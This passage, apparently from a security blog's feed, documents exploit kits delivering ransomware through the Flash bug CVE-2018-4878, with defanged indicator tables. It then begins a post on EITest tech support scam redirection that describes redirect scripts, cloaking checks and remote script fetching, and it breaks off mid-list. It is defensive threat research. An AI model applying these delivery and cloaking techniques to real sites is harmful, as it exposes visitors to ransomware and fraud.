Qihoo360 Post publication reading: Rig Exploit Kit Now Using CVE-2018-8174 to Deliver Monero Miner - 2018-05-31 - Trend Micro Delving deep into VBScript - Analysis of CVE-2018-8174 exploitation - 2018-07-03 - SecureList Hello “Fallout Exploit Kit” - 2018-09-01 - Nao_SecCVE-2018-4878 (Flash Player up to 28.0.0.137) and Exploit Kits2018-03-09T20:19:00+01:002018-03-09T20:19:00+01:00https://malware.dontneedcoffee.com/2018/03/CVE-2018-4878<p>The <a href="http://cve.circl.lu/cve/CVE-2018-4878" title="Circl.lu CVE-2018-4878">CVE-2018-4878</a> is a bug that allows remote code execution in Flash Player up to 28.0.0.137, spotted in the wild as a 0day, <a href="https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998">announced by the South-Korean CERT on the 31st of January</a>. Patched on February 6, 2018 with <a href="https://helpx.adobe.com/security/products/flash-player/apsb18-03.html">ASPB18-03</a>. Seen in <a href="https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massive-malspam-campaign" title="Morphisec Blog">malspam campaign</a> two weeks after, it’s now beeing integrated in Exploit Kits.</p>
<p>This is, as far as i know, the first new working RCE integrated in non targeted Exploit Kit<sup id="fnref:1"><a href="#fn:1" class="footnote">1</a></sup> since <a href="https://malware.dontneedcoffee.com/2016/07/cve-2016-0189-internet-explorer-and.html">CVE-2016-0189</a> in july 2016 (!).</p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-4878/zZzWhat.gif" width="240" alt="zzZz..what?!" class="center" /></p>
<h2 id="greenflash-sundown"><a href="#gf-sundown">GreenFlash Sundown</a>:</h2>
<p><em>Spotted on the 2018-03-09 (but probably there since several days)</em></p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-4878/SundownGF.png" alt="CVE-2018-4878-Successful pass on GreenFlash Sundown" class="center" /></p>
<center><em>Figure 1: Greenflash Sundown successfully deploying Hermes 2.1 Ransomware after exploiting Flash 26.0.0.131 in IE11 on Windows 7 - 2018-03-09 </em></center>
<p><br />
GreenFlash is a private heavily modified version of <a href="https://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html">Sundown EK</a> spotted <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/">in october 2016 by Trendmicro</a>. It’s beeing exclusively used by the “WordsJS” (aka “ShadowGate”) group.
This group is getting traffic from crompromised OpenRevive/OpenX advertising server since at least <a href="http://www.malekal.com/en-openx-hacks-example-malvertising/">may 2015</a>.</p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-4878/WordsJS.png" alt="MISP WordsJS" class="center" /></p>
<center><em>Figure 2: Some tagged activity from WordsJS displayed in <a href="https://www.misp-project.org/">MISP</a>.</em></center>
<p><br />
<strong>Some references about the activities of this group:</strong></p>
<table>
<thead>
<tr>
<th>Blog/Tweet</th>
<th>Date</th>
<th>Author</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.malekal.com/en-openx-hacks-example-malvertising/">OpenX Hacks example (malvertising)</a></td>
<td>2015-05-19</td>
<td><a href="https://twitter.com/malekal_morte">@malekal_morte</a></td>
</tr>
<tr>
<td>[Tweet] <a href="https://twitter.com/BelchSpeak/status/653605534915014656">Malvertising via psychecentral[.]com</a></td>
<td>2015-10-12</td>
<td><a href="https://twitter.com/belchspeak">@BelchSpeak</a></td>
</tr>
<tr>
<td><a href="http://www-test.cyphort.com/psychcental-com-infected-with-angler-ek-installs-bedep-vawtrak-and-pos-malware/">Psychcentral.com […] Angler EK: Installs bedep, vawtrak and POS malware</a></td>
<td>2015-11-02</td>
<td>Cyphort</td>
</tr>
<tr>
<td><a href="http://research.zscaler.com/2016/01/music-themed-malvertising-lead-to-angler.html">Music-themed Malvertising Lead To Angler</a></td>
<td>2016-01-19</td>
<td>Zscaler</td>
</tr>
<tr>
<td>[FR] <a href="http://www.malekal.com/malvertising-openx/">Exemple d’une Malvertising sur OpenX</a></td>
<td>2016-04-13</td>
<td><a href="https://twitter.com/malekal_morte">@malekal_morte</a></td>
</tr>
<tr>
<td><a href="https://blog.malwarebytes.org/threat-analysis/2016/05/top-chilean-news-website-emol-pushes-angler-exploit-kit/">Top Chilean News Website Emol Pushes Angler Exploit Kit</a></td>
<td>2016-05-11</td>
<td>Malwarebytes</td>
</tr>
<tr>
<td><a href="https://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html">Is it the End of Angler ?</a></td>
<td>2016-06-11</td>
<td>MDNC</td>
</tr>
<tr>
<td><a href="https://www.riskiq.com/blog/labs/shadowed-domains-lead-to-neutrino-exploit-kit/">HillaryNixonClinton.com Shadowed Domains Lead to Neutrino EK</a></td>
<td>2016-08-12</td>
<td>RiskIQ</td>
</tr>
<tr>
<td><a href="http://blog.talosintel.com/2016/09/shadowgate-takedown.html">Talos ShadowGate Take Down: Global Malvertising Campaign Thwarted</a><sup id="fnref:2"><a href="#fn:2" class="footnote">2</a></sup></td>
<td>2016-09-01</td>
<td>Talos</td>
</tr>
<tr>
<td><a href="http://www.malware-traffic-analysis.net/2016/10/17/index3.html">Sundown EK from 37.139.47.53 sends Locky Ransomware</a></td>
<td>2016-10-17</td>
<td><a href="https://twitter.com/malware_traffic">@malware_traffic</a></td>
</tr>
<tr>
<td><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/">New Bizarro Sundown Exploit Kit Spreads Locky</a></td>
<td>2016-11-04</td>
<td>Trendmicro</td>
</tr>
</tbody>
</table>
<p><em>Files: <a href="https://www.virustotal.com/#/file/8c10a9abf05d6a6e09ff7f2ac8e5845a5f5f942cfab69c6f0184138f9da2f1a6/detection">Fiddler on VT</a> - <a href="https://www.virustotal.com/#/file/207a655f6232875085f18ca08a3e5e4eab7bc2f1f2d2cb11b43ae89b991297af/detection">Pcap on VT</a> (note: some https proxies were used)</em><br />
<em>IOCs: <a href="https://raw.githubusercontent.com/Kafeine/public/master/IOCs/SundownGF_misp.event.2556.5aa2f05c-4d1c-436f-9c5d-1199c0a8a8de.json">MISP Json</a></em><br /></p>
<table>
<thead>
<tr>
<th>IOC</th>
<th>Type</th>
<th>Comment</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>bannerssale[.]com|159.65.131[.]94</td>
<td>domain|IP</td>
<td>Sundown GF Step 1</td>
<td>2018-01-09</td>
</tr>
<tr>
<td>aquaadvertisement[.]com|159.65.131[.]95</td>
<td>domain|IP</td>
<td>Sundown GF Step 2</td>
<td>2018-03-09</td>
</tr>
<tr>
<td>listening.secondadvertisements[.]com|207.148.104[.]5</td>
<td>domain|IP</td>
<td>Sundown GF Step 3</td>
<td>2018-03-09</td>
</tr>
<tr>
<td><a href="https://www.virustotal.com/en/file/b78682d960385bdd0fe5db9c631f0f38607a3d09a08ddd4024e4922c01cc0533/analysis/">65bd3d860aaf8874ab76a1ecc852a570</a></td>
<td>md5</td>
<td>Ransomware Hermes 2.1</td>
<td>2018-03-09</td>
</tr>
<tr>
<td><a href="https://www.virustotal.com/en/file/8217e5503b34f55edfa9266236c1d88885cbc06276f97b4c1374d679e289d206/analysis/">f84435880c4477d3a552fb5e95f141e1</a></td>
<td>md5</td>
<td>Ransomware Hermes 2.1</td>
<td>2018-03-10</td>
</tr>
</tbody>
</table>
<p><em>If you saw this kind of traffic in your perimeter/telemetry, i’d be happy to get more referer</em> <br /></p>
<p><strong>Edits:</strong><br /></p>
<ul>
<li>2018-03-10 - 15:40 GMT - Removed mention of steganography. <a href="https://twitter.com/smogoreli">@smogoreli</a>: “simple offset in the dat file” <br /></li>
</ul>
<p><strong>Acknowledgement:</strong><br /></p>
<ul>
<li>Thanks to Genwei Jiang <a href="https://www.fireeye.com/">(FireEye)</a> for the CVE identification.</li>
<li>Thanks to <a href="https://twitter.com/jspchc">Joseph Chen</a> for inputs allowing the capture of a fresh pass of GreenFlash Sundown.</li>
<li>Thanks to <a href="https://twitter.com/GelosSnake">@GelosSnake</a> & <a href="https://twitter.com/baberpervez2">@baberpervez2</a> for the ping on suspicious activity that could be associated to “WordsJS” (aka “ShadowGate”) and triggered those checks.<br /></li>
</ul>
<h2 id="magnitude"><a href="#magnitude">Magnitude</a>:</h2>
<p><em>Spotted on the 2018-04-01</em></p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-4878/Magnitude.png" alt="Magnitude_CVE-2018-4878" class="center" /></p>
<center><em>Figure 3: Magnitude successfully deploying Magniber Ransomware after exploiting CVE-2018-4878 on Flash 27.0.0.170 in IE11 on Windows 7 - 2018-04-01 </em></center>
<p><br />
Magnitude is using the <a href="https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/">WSH injection described</a> by <a href="https://twitter.com/enigma0x3">Matt Nelson</a> in August 2017.</p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-4878/magnitude_wshinjection.png" alt="Magnitude_WSHinject" class="center" /></p>
<center><em>Figure 4: UAC prompt on the wsh injection executed upon successful exploitation</em></center>
<p><br />
Payload is the Magniber Ransomware, first spotted in the wild in <a href="https://twitter.com/kafeine/status/920038453924024320">october 2017</a>, in a <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-now-targeting-korea-with-magniber-ransomware/">context documented</a> by Trendmicro.</p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-4878/magnitude_misp.png" alt="MagnigateMagnitudeHistory" class="center" /></p>
<center><em>Figure 5: Some tagged activity from Magnigate displayed in <a href="https://www.misp-project.org/">MISP</a>.</em></center>
<p><br />
<strong>Select OSINT about this infection chain:</strong></p>
<table>
<thead>
<tr>
<th>Blog/Tweet</th>
<th>Date</th>
<th>Author</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.proofpoint.com/us/threat-insight/post/magnitude-actor-social-engineering-scheme-windows-10">Magnitude Actor Adds a Social Engineering Scheme for Windows 10</a></td>
<td>2017-08-03</td>
<td>Proofpoint</td>
</tr>
<tr>
<td>[Tweet] <a href="https://twitter.com/kafeine/status/920038453924024320">Ransomware spread by Magnitude. Hosted behind same infra. KOR focused for now </a></td>
<td>2017-10-16</td>
<td>Kafeine</td>
</tr>
<tr>
<td><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-now-targeting-korea-with-magniber-ransomware/">Magnitude Exploit Kit Now Targeting South Korea With Magniber Ransomware</a></td>
<td>2017-10-18</td>
<td>Trendmicro</td>
</tr>
</tbody>
</table>
<p><em>Files: <a href="https://www.virustotal.com/#/file/b1b51bc0b48789ad64b178a6c5e7555734b02aba16392341ef7f86378eb9fcd0/detection">Fiddler on VT</a> - <a href="https://www.virustotal.com/#/file/b796f308658fc505432b54b60be373810dee0b2ba4da82bf6ea51c3a12b84863/detection">Pcap on VT</a> (note: some https proxies were used)</em><br />
<em>IOCs: <a href="https://github.com/Kafeine/public/blob/master/IOCs/Magnitude_CVE-2018-4878_misp.event.2652.5ac10f16-8c28-4c22-991c-55e0c0a8a8de.json">MISP Json</a> (note: all those are changing almost hourly)</em><br /></p>
<table>
<thead>
<tr>
<th>IOC</th>
<th>Type</th>
<th>Comment</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>finansee[.]credit|209.95.60[.]115</td>
<td>domain|IP</td>
<td>Magnigate Step 1</td>
<td>2018-04-01</td>
</tr>
<tr>
<td>adex7s92616.fryrids[.]com|144.217.197[.]9</td>
<td>domain|IP</td>
<td>Magnigate Step 2</td>
<td>2018-04-01</td>
</tr>
<tr>
<td>353kb544cv.anlogs[.]space|66.70.223[.]111</td>
<td>domain|IP</td>
<td>Magnitude Exploit Kit</td>
<td>2018-04-01</td>
</tr>
<tr>
<td>*.fitpint[.]website|139.60.161[.]43</td>
<td>domain|IP</td>
<td>Magniber Payment server</td>
<td>2018-04-01</td>
</tr>
<tr>
<td>*.riskjoy[.]pw|162.213.25[.]235</td>
<td>domain|IP</td>
<td>Magniber Payment server</td>
<td>2018-04-01</td>
</tr>
<tr>
<td>*.ratesor[.]site|198.56.183[.]147</td>
<td>domain|IP</td>
<td>Magniber Payment server</td>
<td>2018-04-01</td>
</tr>
<tr>
<td>*.accorda[.]space|107.167.77[.]100</td>
<td>domain|IP</td>
<td>Magniber Payment server</td>
<td>2018-04-01</td>
</tr>
<tr>
<td>*.uxijz4kdhr4jp3wf[.]onion</td>
<td>domain</td>
<td>Magniber Payment server on tor</td>
<td>2018-04-01</td>
</tr>
<tr>
<td><a href="https://www.virustotal.com/en/file/e3b52d94521dd0e1f6a5a4cde0d73654388492a28f4a72989f105bc72bb91a16/analysis/">1d4b9c4b4058bfc2238e92c0eebb5906</a></td>
<td>md5</td>
<td>Magniber Ransomware</td>
<td>2018-04-01</td>
</tr>
</tbody>
</table>
<h2 id="rig"><a href="#rig">RIG</a>:</h2>
<p><em>Spotted on the 2018-04-09</em></p>
<p>Replying to a customer complaining yesterday (2018-04-08) about the lack of CVE-2018-4878, “TakeThat” wrote early this morning (2018-04-09):</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Чистки выполняются вовремя
Конечно мы добавили флеш CVE-2018-4878 он доступен на подписке от недели
</code></pre></div></div>
<p>Translated by google as:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Cleaning is done on time
Of course, we added the flash CVE-2018-4878 it is available on subscription from the week
</code></pre></div></div>
<p>And indeed today as spotted by <a href="https://twitter.com/nao_sec/status/983381097328214016">@nao_sec</a>:</p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-4878/rig_cve-2018-4878.png" alt="RIG_CVE-2018-4878" class="center" /></p>
<center><em>Figure 6: RIG successfully exploiting CVE-2018-4878 on Flash 27.0.0.170 in IE11 on Windows 7 - 2018-04-09 </em></center>
<p><br /></p>
<table>
<thead>
<tr>
<th>IOC</th>
<th>Type</th>
<th>Comment</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>cash111[.]club|18.220.221[.]2</td>
<td>domain|IP</td>
<td>Keitaro TDS</td>
<td>2018-04-09</td>
</tr>
<tr>
<td>185.154.53.190</td>
<td>IP</td>
<td>RIG</td>
<td>2018-04-09</td>
</tr>
<tr>
<td>omega.level7[.]gdn|89.45.67[.]198</td>
<td>domain|IP</td>
<td>Urausy C2</td>
<td>2018-04-09</td>
</tr>
<tr>
<td><a href="https://www.virustotal.com/en/file/437520117f4deb7691bc0975e413b72c862aef8b18851930f515a385a6a3d54f/analysis/">1bd20aa0433f3f03001b7f3e6f1fb110</a></td>
<td>md5</td>
<td>RIG Flash Exploit</td>
<td>2018-04-09</td>
</tr>
<tr>
<td><a href="https://www.virustotal.com/en/file/66aa01238a0fd28311fc0eb3c3d748eda761a7cdc66538eda18f66e502174ef7/analysis/">712385a6073303a20163e4c9fb079117</a></td>
<td>md5</td>
<td>Urausy - probably as a loader</td>
<td>2018-04-09</td>
</tr>
</tbody>
</table>
<h2 id="fallout"><a href="#fallout">Fallout</a>:</h2>
<p><em>Spotted on 2018-06-28, most probably there since 2018-06-16</em></p>
<p>Despite seeing code pointing to it, we did not saw it properly called in traffic.</p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-4878/fallout_1.png" alt="Fallout_CVE-2018-4878 Call" class="center" /></p>
<center><em>Figure 6: Fallout call for CVE-2018-4878 in it's landing 2018-08-30 </em></center>
<p><br /></p>
<table>
<thead>
<tr>
<th>Blog/Tweet</th>
<th>Date</th>
<th>Author</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.nao-sec.org/2018/09/hello-fallout-exploit-kit.html">Hello “Fallout Exploit Kit”</a></td>
<td>2018-09-01</td>
<td><a href="https://twitter.com/nao_sec/">Nao_Sec</a></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>IOC</th>
<th>Type</th>
<th>Comment</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>md5</td>
<td><a href="https://www.virustotal.com/#/file/c148012f9ce59daea1abce2cfaac9c0732e86b7eb00468222b63436306c39d26/details">747c32e55b4e847c3274503290507aa1</a></td>
<td>Fallout Flash Exploit</td>
<td>2018-08-31</td>
</tr>
</tbody>
</table>
<p><strong>Edits:</strong><br /></p>
<ul>
<li>2018-04-10 - 10:05 GMT - Modified to reflect payload id: Urausy. Not seen since 2015-06-09<br /></li>
</ul>
<p><strong>Acknowledgement:</strong><br /></p>
<ul>
<li>Thanks to <a href="https://twitter.com/StopMalvertisin">Kimberly</a> for the payload identification.</li>
</ul>
<div class="footnotes">
<ol>
<li id="fn:1">
<p>For instance CVE-2016-7855 has been integrated as a 0day in Sednit EK in october 2016. <a href="#fnref:1" class="reversefootnote">↩</a></p>
</li>
<li id="fn:2">
<p>It was not exactly a malvertising but some ad server compromission and nothing, but a bunch of shadowed domains, was really taken down <a href="#fnref:2" class="reversefootnote">↩</a></p>
</li>
</ol>
</div>Kafeinehttps://twitter.com/kafeineThe CVE-2018-4878 is a bug that allows remote code execution in Flash Player up to 28.0.0.137, spotted in the wild as a 0day, announced by the South-Korean CERT on the 31st of January. Patched on February 6, 2018 with ASPB18-03. Seen in malspam campaign two weeks after, it’s now beeing integrated in Exploit Kits. This is, as far as i know, the first new working RCE integrated in non targeted Exploit Kit1 since CVE-2016-0189 in july 2016 (!). GreenFlash Sundown: Spotted on the 2018-03-09 (but probably there since several days) Figure 1: Greenflash Sundown successfully deploying Hermes 2.1 Ransomware after exploiting Flash 26.0.0.131 in IE11 on Windows 7 - 2018-03-09 GreenFlash is a private heavily modified version of Sundown EK spotted in october 2016 by Trendmicro. It’s beeing exclusively used by the “WordsJS” (aka “ShadowGate”) group. This group is getting traffic from crompromised OpenRevive/OpenX advertising server since at least may 2015. Figure 2: Some tagged activity from WordsJS displayed in MISP. Some references about the activities of this group: Blog/Tweet Date Author OpenX Hacks example (malvertising) 2015-05-19 @malekal_morte [Tweet] Malvertising via psychecentral[.]com 2015-10-12 @BelchSpeak Psychcentral.com […] Angler EK: Installs bedep, vawtrak and POS malware 2015-11-02 Cyphort Music-themed Malvertising Lead To Angler 2016-01-19 Zscaler [FR] Exemple d’une Malvertising sur OpenX 2016-04-13 @malekal_morte Top Chilean News Website Emol Pushes Angler Exploit Kit 2016-05-11 Malwarebytes Is it the End of Angler ? 2016-06-11 MDNC HillaryNixonClinton.com Shadowed Domains Lead to Neutrino EK 2016-08-12 RiskIQ Talos ShadowGate Take Down: Global Malvertising Campaign Thwarted2 2016-09-01 Talos Sundown EK from 37.139.47.53 sends Locky Ransomware 2016-10-17 @malware_traffic New Bizarro Sundown Exploit Kit Spreads Locky 2016-11-04 Trendmicro Files: Fiddler on VT - Pcap on VT (note: some https proxies were used) IOCs: MISP Json IOC Type Comment Date bannerssale[.]com|159.65.131[.]94 domain|IP Sundown GF Step 1 2018-01-09 aquaadvertisement[.]com|159.65.131[.]95 domain|IP Sundown GF Step 2 2018-03-09 listening.secondadvertisements[.]com|207.148.104[.]5 domain|IP Sundown GF Step 3 2018-03-09 65bd3d860aaf8874ab76a1ecc852a570 md5 Ransomware Hermes 2.1 2018-03-09 f84435880c4477d3a552fb5e95f141e1 md5 Ransomware Hermes 2.1 2018-03-10 If you saw this kind of traffic in your perimeter/telemetry, i’d be happy to get more referer Edits: 2018-03-10 - 15:40 GMT - Removed mention of steganography. @smogoreli: “simple offset in the dat file” Acknowledgement: Thanks to Genwei Jiang (FireEye) for the CVE identification. Thanks to Joseph Chen for inputs allowing the capture of a fresh pass of GreenFlash Sundown. Thanks to @GelosSnake & @baberpervez2 for the ping on suspicious activity that could be associated to “WordsJS” (aka “ShadowGate”) and triggered those checks. Magnitude: Spotted on the 2018-04-01 Figure 3: Magnitude successfully deploying Magniber Ransomware after exploiting CVE-2018-4878 on Flash 27.0.0.170 in IE11 on Windows 7 - 2018-04-01 Magnitude is using the WSH injection described by Matt Nelson in August 2017. Figure 4: UAC prompt on the wsh injection executed upon successful exploitation Payload is the Magniber Ransomware, first spotted in the wild in october 2017, in a context documented by Trendmicro. Figure 5: Some tagged activity from Magnigate displayed in MISP. Select OSINT about this infection chain: Blog/Tweet Date Author Magnitude Actor Adds a Social Engineering Scheme for Windows 10 2017-08-03 Proofpoint [Tweet] Ransomware spread by Magnitude. Hosted behind same infra. KOR focused for now 2017-10-16 Kafeine Magnitude Exploit Kit Now Targeting South Korea With Magniber Ransomware 2017-10-18 Trendmicro Files: Fiddler on VT - Pcap on VT (note: some https proxies were used) IOCs: MISP Json (note: all those are changing almost hourly) IOC Type Comment Date finansee[.]credit|209.95.60[.]115 domain|IP Magnigate Step 1 2018-04-01 adex7s92616.fryrids[.]com|144.217.197[.]9 domain|IP Magnigate Step 2 2018-04-01 353kb544cv.anlogs[.]space|66.70.223[.]111 domain|IP Magnitude Exploit Kit 2018-04-01 *.fitpint[.]website|139.60.161[.]43 domain|IP Magniber Payment server 2018-04-01 *.riskjoy[.]pw|162.213.25[.]235 domain|IP Magniber Payment server 2018-04-01 *.ratesor[.]site|198.56.183[.]147 domain|IP Magniber Payment server 2018-04-01 *.accorda[.]space|107.167.77[.]100 domain|IP Magniber Payment server 2018-04-01 *.uxijz4kdhr4jp3wf[.]onion domain Magniber Payment server on tor 2018-04-01 1d4b9c4b4058bfc2238e92c0eebb5906 md5 Magniber Ransomware 2018-04-01 RIG: Spotted on the 2018-04-09 Replying to a customer complaining yesterday (2018-04-08) about the lack of CVE-2018-4878, “TakeThat” wrote early this morning (2018-04-09): Чистки выполняются вовремя Конечно мы добавили флеш CVE-2018-4878 он доступен на подписке от недели Translated by google as: Cleaning is done on time Of course, we added the flash CVE-2018-4878 it is available on subscription from the week And indeed today as spotted by @nao_sec: Figure 6: RIG successfully exploiting CVE-2018-4878 on Flash 27.0.0.170 in IE11 on Windows 7 - 2018-04-09 IOC Type Comment Date cash111[.]club|18.220.221[.]2 domain|IP Keitaro TDS 2018-04-09 185.154.53.190 IP RIG 2018-04-09 omega.level7[.]gdn|89.45.67[.]198 domain|IP Urausy C2 2018-04-09 1bd20aa0433f3f03001b7f3e6f1fb110 md5 RIG Flash Exploit 2018-04-09 712385a6073303a20163e4c9fb079117 md5 Urausy - probably as a loader 2018-04-09 Fallout: Spotted on 2018-06-28, most probably there since 2018-06-16 Despite seeing code pointing to it, we did not saw it properly called in traffic. Figure 6: Fallout call for CVE-2018-4878 in it's landing 2018-08-30 Blog/Tweet Date Author Hello “Fallout Exploit Kit” 2018-09-01 Nao_Sec IOC Type Comment Date md5 747c32e55b4e847c3274503290507aa1 Fallout Flash Exploit 2018-08-31 Edits: 2018-04-10 - 10:05 GMT - Modified to reflect payload id: Urausy. Not seen since 2015-06-09 Acknowledgement: Thanks to Kimberly for the payload identification. For instance CVE-2016-7855 has been integrated as a 0day in Sednit EK in october 2016. ↩ It was not exactly a malvertising but some ad server compromission and nothing, but a bunch of shadowed domains, was really taken down ↩The King of traffic distribution2018-03-07T10:01:00+01:002018-03-07T10:01:00+01:00https://malware.dontneedcoffee.com/hosted/anonymous/kotd<p>Disclaimer: This post is hosted here as a courtesy to the author who prefers to remain anonymous. MDNC was not involved in any way with this study.</p>
<h2 id="introduction">Introduction</h2>
<p>EITest is one of the longest malicious delivery campaigns that has continued to evolve. In the spring of 2017, it started redirecting Internet Explorer users to tech support scams in addition to the existing redirections with the fake Chrome fonts.</p>
<p>We believe the tech support scam campaign we are describing in this post is one of the most widespread and well organized because it relies on several schemes in addition to EITest, such as traffic redirection using a distributed system infrastructure.</p>
<p>Actors behind this campaign are generating hundreds of domains per day.The only purpose of those domains names is to redirect users to tech support scams or malicious websites.</p>
<h2 id="highlights">Highlights</h2>
<ul>
<li>
<p>We were able to redirect a considerable amount of traffic destined to Tech Support Scam websites to a controlled infrastructure for a period of 8 hours. After they fixed the flaw that allowed us to do that, we were able to bypass the new protection in place to take control again of the traffic for another 6 hours.</p>
</li>
<li>
<p>We discovered a network of bots controlled by a fraudulent Traffic Monetization company</p>
</li>
<li>
<p>We’ve collected a list of 1562+1294 compromised websites responsible for the redirections of users to scams</p>
</li>
<li>
<p>The actors are generating over 100 new domains each day to serve TSS via <a href="http://www.freenom.com">Freenom</a></p>
</li>
</ul>
<h2 id="the-scam">The scam</h2>
<p>The landing page sometimes changes, but always has the same goal: trying to take control of the browser so the user cannot close it, in hopes that they will panic and call the phone number for assistance.</p>
<p><img src="https://i.imgur.com/tSJMGVg.png" alt="TSS-IE" class="center" /></p>
<p>Tech support scammer (TSS) are sometimes changing the landing page to better abuse the browser. Anyhow, this is what the current landing page looks like.</p>
<p>People that call those numbers will be told how to install a remote control software so the interlocutor can show Windows log events and services to the user, pretending that those are signs of an infected machine. The crooks will then offer a remote reparation service varying from $100 to $600.</p>
<p><img src="https://i.imgur.com/ofxzCJt.png" alt="Tech Support Scammer" class="center" /></p>
<h2 id="look-at-different-redirection-mechanisms">Look at different redirection mechanisms</h2>
<p>While analyzing the different ways for a user to be redirected to those scam support pages that try to hijack the browsers, we quickly documented multiple different redirection schemes using many different infrastructure. For this reason, we believe that many differents actors are responsible for sending traffic to the redirection network. Let’s begin by describing the most prolific methods of redirections.</p>
<p><img src="https://i.imgur.com/lxHMnaw.png" alt="Redirections_mechanisms" class="center" /></p>
<h2 id="eitest-redirection">EITest Redirection</h2>
<p>EITest infected websites have the capability of injecting javascript in page upon loading. We can observe redirections to tech support scam (TSS) websites <a href="http://www.malware-traffic-analysis.net/2017/05/25/index3.html">since 2017</a>. The injection that occurs when the victim’s user-agent is IE, Edge or Firefox, is the following:</p>
<p><img src="https://i.imgur.com/NXWZrn3.png" alt="EITest TSS" class="center" /></p>
<p>This script will, after verifying that it is running in a real browser, set a cookie named “<strong>popundr</strong>” and redirect the user at a decoy URL, <code class="highlighter-rouge">hxxp://checkalldir.bid/index/?MGjJPm</code> in this case. Decoy domains injected resolve to IP <strong>204.155.28.5</strong>, in a range belonging to KING-SERVERS (AS 14576). Since 2018-02-26, injected domains were resolving to IP <strong>54.36.180.110</strong> at OVH instead (AS16276). It later changed back to <strong>162.244.35.33</strong>, where TSS domains are now pointing.</p>
<p>This EITest campaign is generating ~1 new domain per day (usually with the TLD .bid). Those are easily recognizable by their patterns “<strong>/?{6 characters}</strong>” in the URL, but the pattern is changing about 4 times per day. The reason they are using a decoy URL and a specific pattern is so they can be routed through their Keitaro TDS (traffic distribution system). In fact, we can browse to the panel of this TDS by accessing it with the IP address at URN <strong>/admin</strong>:</p>
<p><img src="https://i.imgur.com/ubrDuCY.png" alt="tds" class="center" /></p>
<p>Routing requests to their TDS before landing on the final destination allows them to have better control of the traffic and manage multiple campaigns. They are also doing more filtering on who will be redirected through this URL. We know that they are verifying at least the user-agent of the requester before allowing any redirection. Here is what will happen when the victims get redirected to one of those domains:</p>
<p><img src="https://i.imgur.com/32udaW5.png" alt="Curl referenz.bid" class="center" /></p>
<p>In this case, querying the decoy EITest URL with an user-agent set to “MSIE” was enough for the TDS to send a 302 redirection to the landing page: <code class="highlighter-rouge">hxxp://coloured-canvas.tk/?number=800-803-1741</code></p>
<h2 id="crypper-redirection">Crypper Redirection</h2>
<p><img src="https://i.imgur.com/r715xB2.jpg" alt="Crypper Redirection" class="center" /></p>
<p>This campaign generates about 165 redirections / hour. Website <code class="highlighter-rouge">luyengame.com</code> was responsible for 904 redirections (68%).</p>
<p>For this redirection, we were able to get our hands on the malicious PHP file that is responsible for the generation of the script that redirects users:</p>
<p><img src="https://i.imgur.com/wl9prP0.png" alt="Crypper code" class="center" /></p>
<p>The PHP code will start by hiding any errors from the output and get the user-agent and referer of the visitor. Prior to the creation of the javascript that will redirect the user, the code checks that the visitor is not a bot (crawler) and that the visitor is not on a mobile device. If those checks pass, it will fetch the current Tech Support Scam (TSS) domain <code class="highlighter-rouge">hxxp://roi777.com/domain.php</code> and append the path “<strong>/index/?2661511868997</strong>” to it.</p>
<p>Finally, the function “<strong>redirectdd</strong>” is called with the created URL and the script will output with the latest domain that <code class="highlighter-rouge">roi777.com</code> provided:</p>
<p><img src="https://i.imgur.com/ZhZRVlM.png" alt="Crypper TSS" class="center" /></p>
<p>The script then sets a cookie “<strong>1561065164894_CRYPPER</strong>” and redirects the user with <strong>window.location</strong>. Although simple, this script is efficient enough to redirect many visitors.</p>
<h2 id="biz-redirection">Biz Redirection</h2>
<p><img src="https://i.imgur.com/zoIK5qq.jpg" alt="Biz Redirection jpeg" class="center" /></p>
<p>This campaign generates about 1888 redirections / hour. Website <code class="highlighter-rouge">myilifestyle.com</code> was responsible for 1199 redirections (8%) and <code class="highlighter-rouge">www.fertilitychef.com</code> for 1091 (7%) of the redirections.</p>
<p>This redirection is distinguishable with the added path to the TSS domain: “<strong>/index/?2171506271081</strong>”.</p>
<p><img src="https://i.imgur.com/G7lfNPK.png" alt="Biz Code" class="center" /></p>
<p>The script will fetch another script from <code class="highlighter-rouge">hxxp://5.45.67.97/1/jquery.js.php</code> and run it, leading to a redirection:</p>
<p><img src="https://i.imgur.com/ROiaKat.png" alt="Biz Redirection png" class="center" /></p>
<h2 id="plugin-redirection">Plugin Redirection</h2>
<p><img src="https://i.imgur.com/H9JjeBT.jpg" alt="Plugin Redirection" class="center" /></p>
<p>This campaign generates about 184 redirections / hour. Website <code class="highlighter-rouge">Archive-s54.info</code> was responsible for 119 redirections (8%).</p>
<p>This campaign has malicious Javascript slightly obfuscated by using the “reverse string” function:</p>
<p><img src="https://i.imgur.com/YIYBvDd.png" alt="Plugin TSS" class="center" /></p>
<p>There are a few variants of this script containing different URLs. By applying the reverse string function again on the string containing the malicious URL, we were able to identified all of them:</p>
<ul>
